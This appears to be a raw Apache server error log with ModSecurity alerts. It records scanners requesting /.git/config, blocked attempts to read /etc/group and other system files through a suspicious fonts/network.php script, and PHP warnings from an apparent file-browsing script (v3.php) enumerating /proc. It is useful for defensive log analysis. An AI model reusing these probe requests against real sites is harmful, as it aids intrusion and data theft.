[Mon May 11 17:46:08.964826 2026] [security2:error] [pid 1411099:tid 1411124] [client 43.157.142.101:43516] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.la-grande-fabrique.com"] [uri "/"] [unique_id "agH5wA-Qm4vhlWBPlMjWsQAAABg"]
[Mon May 11 17:46:14.804089 2026] [security2:error] [pid 1416109:tid 1416132] [client 34.118.104.12:43548] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/.git/config"] [unique_id "agH5xlV4kyjgo4bQBUhyUAAAAMI"]
[Mon May 11 17:46:14.804350 2026] [security2:error] [pid 1416109:tid 1416132] [client 34.118.104.12:43548] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/.git/config"] [unique_id "agH5xlV4kyjgo4bQBUhyUAAAAMI"]
[Mon May 11 17:46:19.217934 2026] [security2:error] [pid 1416109:tid 1416148] [client 34.118.104.12:42524] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/.git/config"] [unique_id "agH5y1V4kyjgo4bQBUhyVAAAANI"]
[Mon May 11 17:46:19.221886 2026] [security2:error] [pid 1416109:tid 1416148] [client 34.118.104.12:42524] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/.git/config"] [unique_id "agH5y1V4kyjgo4bQBUhyVAAAANI"]
[Mon May 11 17:46:20.242007 2026] [security2:error] [pid 1416109:tid 1416132] [client 34.118.104.12:43548] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agH5xlV4kyjgo4bQBUhyUAAAAMI"]
[Mon May 11 17:46:21.904837 2026] [security2:error] [pid 1416109:tid 1416148] [client 34.118.104.12:42524] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agH5y1V4kyjgo4bQBUhyVAAAANI"]
[Mon May 11 17:47:01.558457 2026] [security2:error] [pid 1416109:tid 1416150] [client 216.73.216.110:13677] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:filesrc: /etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agH59VV4kyjgo4bQBUhyjwAAANQ"]
[Mon May 11 17:47:01.559482 2026] [security2:error] [pid 1416109:tid 1416150] [client 216.73.216.110:13677] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agH59VV4kyjgo4bQBUhyjwAAANQ"]
[Mon May 11 17:47:01.651554 2026] [security2:error] [pid 1416109:tid 1416150] [client 216.73.216.110:13677] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH59VV4kyjgo4bQBUhyjwAAANQ"]
[Mon May 11 17:47:47.518087 2026] [security2:error] [pid 1416109:tid 1416154] [client 216.73.216.110:39845] ModSecurity: Warning. Matched phrase "usr/sbin/pure-config.pl" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: usr/sbin/pure-config.pl found within ARGS:filesrc: /usr/sbin/pure-config.pl"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agH6I1V4kyjgo4bQBUhytwAAANg"]
[Mon May 11 17:47:47.519192 2026] [security2:error] [pid 1416109:tid 1416154] [client 216.73.216.110:39845] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agH6I1V4kyjgo4bQBUhytwAAANg"]
[Mon May 11 17:47:47.612349 2026] [security2:error] [pid 1416109:tid 1416154] [client 216.73.216.110:39845] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH6I1V4kyjgo4bQBUhytwAAANg"]
PHP Warning:  filesize(): stat failed for /proc/19/task/19/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/19/task/19/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/19/task/19/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/19/task/19/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/19/task/19/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/19/task/19/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704253/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704253/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704253/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/230/task/230/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/230/task/230/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/230/task/230/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/230/task/230/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/230/task/230/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/230/task/230/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /etc/rc.d/rc3.d/K15htcacheclean in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /etc/rc.d/rc3.d/K15htcacheclean in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /etc/rc.d/rc3.d/K15httpd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /etc/rc.d/rc3.d/K15httpd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /etc/rc.d/rc3.d/K50netconsole in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /etc/rc.d/rc3.d/K50netconsole in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 17:48:30.740788 2026] [ssl:error] [pid 1411055:tid 1411074] (EAI 2)Name or service not known: [client 43.155.27.244:53702] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:48:30.741741 2026] [ssl:error] [pid 1411055:tid 1411074] AH01941: stapling_renew_response: responder error
[Mon May 11 17:48:31.007101 2026] [security2:error] [pid 1411055:tid 1411074] [client 43.155.27.244:53702] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "happy-baby-box.fr"] [uri "/"] [unique_id "agH6T0WKUxpmnkK7zHybcwAAARE"], referer: http://happy-baby-box.fr
[Mon May 11 17:48:34.031078 2026] [ssl:error] [pid 1416109:tid 1416133] (EAI 2)Name or service not known: [client 43.155.27.244:34660] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:48:34.031126 2026] [ssl:error] [pid 1416109:tid 1416133] AH01941: stapling_renew_response: responder error
[Mon May 11 17:48:34.343182 2026] [security2:error] [pid 1416109:tid 1416133] [client 43.155.27.244:34660] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "happy-baby-box.fr"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "agH6UlV4kyjgo4bQBUhzDgAAAMM"], referer: https://happy-baby-box.fr/
PHP Warning:  filesize(): stat failed for /proc/557/task/557/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/557/task/557/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/557/task/557/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/557/task/557/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/557/task/557/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/557/task/557/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 17:49:52.476273 2026] [security2:error] [pid 1411099:tid 1411292] [client 194.53.140.123:60007] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agH6oA-Qm4vhlWBPlMjX0wAAAAg"], referer: https://www.piregwan-genesis.com/
[Mon May 11 17:50:06.232831 2026] [security2:error] [pid 1411055:tid 1411077] [client 43.165.174.53:44738] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-mobilite-regional.com"] [uri "/"] [unique_id "agH6rkWKUxpmnkK7zHyb1QAAARQ"]
[Mon May 11 17:50:10.496564 2026] [security2:error] [pid 1416109:tid 1416134] [client 43.165.174.53:57080] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agH6slV4kyjgo4bQBUhzawAAAMQ"], referer: http://pole-mobilite-regional.com
[Mon May 11 17:50:15.360991 2026] [security2:error] [pid 1411055:tid 1411060] [client 43.165.174.53:60066] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agH6t0WKUxpmnkK7zHyb3gAAAQM"], referer: https://www.pole-de-mobilite-regional.com/
[Mon May 11 17:50:29.798431 2026] [security2:error] [pid 1416109:tid 1416136] [client 43.153.192.98:48974] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agH6xVV4kyjgo4bQBUhzfgAAAMY"], referer: http://www.piregwan-genesis.com/liens/redirect.php?url=https://plugsneakrs.com
PHP Warning:  filesize(): stat failed for /proc/104/task/104/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/104/task/104/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/104/task/104/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/104/task/104/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/104/task/104/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/104/task/104/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/695/task/695/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/695/task/695/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/695/task/695/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/695/task/695/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/695/task/695/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/695/task/695/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/210/task/210/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/210/task/210/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/210/task/210/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/210/task/210/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/210/task/210/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/210/task/210/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 17:50:49.140137 2026] [security2:error] [pid 1424905:tid 1424926] [client 43.156.225.86:60654] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.apoe.fr"] [uri "/"] [unique_id "agH62YW8yzYoWG_eyCW1aAAAAVI"], referer: http://www.apoe.fr
[Mon May 11 17:50:55.011784 2026] [security2:error] [pid 1416109:tid 1416149] [client 43.134.1.185:38944] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "domaine-de-janasse.com"] [uri "/"] [unique_id "agH631V4kyjgo4bQBUhzkwAAANM"]
PHP Warning:  filesize(): stat failed for /proc/105/task/105/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/105/task/105/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/105/task/105/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/105/task/105/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/105/task/105/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/105/task/105/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 17:51:55.048300 2026] [security2:error] [pid 1411201:tid 1411259] [client 43.140.247.223:47084] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "classist.fr"] [uri "/"] [unique_id "agH7G_y_GXSWIKeli0sTkwAAAI0"]
[Mon May 11 17:51:55.693386 2026] [security2:error] [pid 1412074:tid 1412076] [client 34.53.154.146:40194] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/.git/config"] [unique_id "agH7GzJnyuKVXoStDhbT6AAAAEA"]
[Mon May 11 17:51:55.693602 2026] [security2:error] [pid 1412074:tid 1412076] [client 34.53.154.146:40194] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/.git/config"] [unique_id "agH7GzJnyuKVXoStDhbT6AAAAEA"]
[Mon May 11 17:51:58.515191 2026] [security2:error] [pid 1412074:tid 1412076] [client 34.53.154.146:40194] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agH7GzJnyuKVXoStDhbT6AAAAEA"]
[Mon May 11 17:52:01.814101 2026] [security2:error] [pid 1416109:tid 1416134] [client 34.53.154.146:54832] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/.git/config"] [unique_id "agH7IVV4kyjgo4bQBUhzzwAAAMQ"]
